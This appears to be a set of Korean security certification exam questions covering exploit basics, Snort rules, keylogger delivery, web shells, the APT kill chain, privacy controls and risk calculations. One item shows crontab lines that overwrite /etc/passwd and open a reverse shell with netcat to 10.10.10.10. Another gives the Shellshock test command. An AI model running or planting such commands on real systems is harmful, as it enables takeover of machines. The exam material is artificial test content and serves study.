1) 실행 코드의 정보가 저장되는 영역 2) 전역변수, 상수의 정보가 저장되는 영역 3) DLL에서 가져온 함수 정보가 저장되는 영역
1) 실제로 기계어로 구성되어 Exploit의 본체에 해당하는 프로그램의 명칭은 무엇인가? 2) x86계열에서 NOP(No Operation) code를 hex로 표현함ㄴ 어느값인가? 3) x86계열에서 ESP에 들어있는 값을 EIP로 이동하는 어셈블리 코드를 적으시오.
1) 도메인 DNS서버를 등록하는 절차 2) DNS 서버에 서비스정보를 입력하는 절차
alert tcp any any (( A ):"|00FF|";( B ):9,( C ):2)
키로거는 사용자가 키보드로 PC에 입력하는 내용을 몰래 낚아채어 기록하는 행위를 말한다. 하드웨어, 소프트웨어를 활용한 방법에서부터 전자적, 음향기술을 활용한 기법까지 다양한 키로깅 방법이 존재한다. 다음은 사용자 몰래 키로거를 설치할 수 있는 방법들이다. 어떤 방법들인가? 1) 사용자가 접속한 웹페이지에서 팝업, iframe, 리다이렉트 등을 통해 사용자가 인식하지 못하게 악성코드를 다운로드 시키는 침해유형을 말한다. 2) 정상 애플리케이션인 것처럼 배포된 뒤 자신의 내부에 압축해서 가지고 있던 코드를 이용하여 새로운 악성코드를 생성하여 시스템을 감염시킨다.
파일 업로드 취약점이 존재하는 경우 공격자가 웹서버에 명령을 수행할 수 있도록 작성한 ( 괄호 )를 업로드하여 웹서버에 명령을 실행해 관리자 권한을 획득후 웹페이지 소스코드 열람, 서버 내 파일유형, 백도어 프로그램 설치등을 할수 있다.
APT는 지능형 지속공격으로 특정 회사의 중요 정보 획득, 정치적 목적,사이버 테러 등을 목적으로 하는 해커에 의해 사이트, 기업, 개인을 상대로 지속적으로 해킹하는 공격을 의미한다. 이에 대한 대비책인 ( 괄호 ) 는 록히드마틴사가 정식 명칭을 특허로 등록하였다. 군사용으로 적 미사일 기지에 대한 선제공격을 의미하며, 사이버 공격에 대한 선제 대응책으로 사회적인 이슈로 대두되기도 하였다. APT 공격의 경우 7단계의 (정찰->무기제작 배달->취약점 공격->설치->명령 및 제어 -> 표적대상행동) 공격을 진행한다. 특헝 기관을 노릴경우 대상이 무엇이든지 간에 조금씩 침투하여 공격을 감행하는 것이 특징이며, 이중 가장 취약한 절차에 대해서만 선제대응할 수 있다면 APT공격을 예방할수 있다는 것을 의미한다.
1) 발생가능한 잠재적인 문제들을 식별하여 사전에 대응하기 위한 통제 2) 1번 통제를 우회하여 발생하는 위협을 찾아내기 위한 통제 3) 2번 통제에 따라 발견한 위협에 대처하거나 줄이는 통제
개인정보처리자가 개인정보를 안전하게 관리하기 위하여 내부 의사결정 절차를 통하여 수립시행하는 내부기준을 말한다. 이 내부 계획에는 아래의 내용이 포함되어야 한다. 1. 개인정보관리책임자의 자격요건 및 지정에 관한 사항 2. 개인정보관리책임자와 개인정보취급자의 역할 및 책임에 관한 사항 3. 개인정보의 기술적·관리적 보호조치 이행 여부의 내부 점검에 관한 사항 4. 개인정보 처리업무를 위탁하는 경우 수탁자에 대한 관리 및 감독에 관한 사항 5. 개인정보의 분실·도난·누출·변조·훼손 등이 발생한 경우의 대응절차 및 방법에 관한 사항
1) 공격 원리를 서술하시오. 2) 방화벽 없이 공격을 막을 수 있는 방법을 설명하시오.
1) SLE이란 무엇인가? 2) SLE를 구하는 식을 적으시오. 3) ALE를 구할때 SLE를 제외하고 필요한 것은 무엇인가? 4) 연수익이 5천만원인 사이트 위험을 완전히 제거하는 비용이 연간 1억원이라고 할 때 이 사이트의 ROI는?
0 0 6 * * root /bin/cp /tmp/passwd1 /etc/passwd 0 0 12 * * root /usr/bin/nc 10.10.10.10 80 -e /bin/bash
$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"1) 이 취약점의 이름은? 2) 보기의 명령을 실행했을 때 취약점이 존재하는 경우와 존재하지 않는 경우의 결과를 설명하시오. 3) 결과가 나오는 이유에 대해 설명하시오.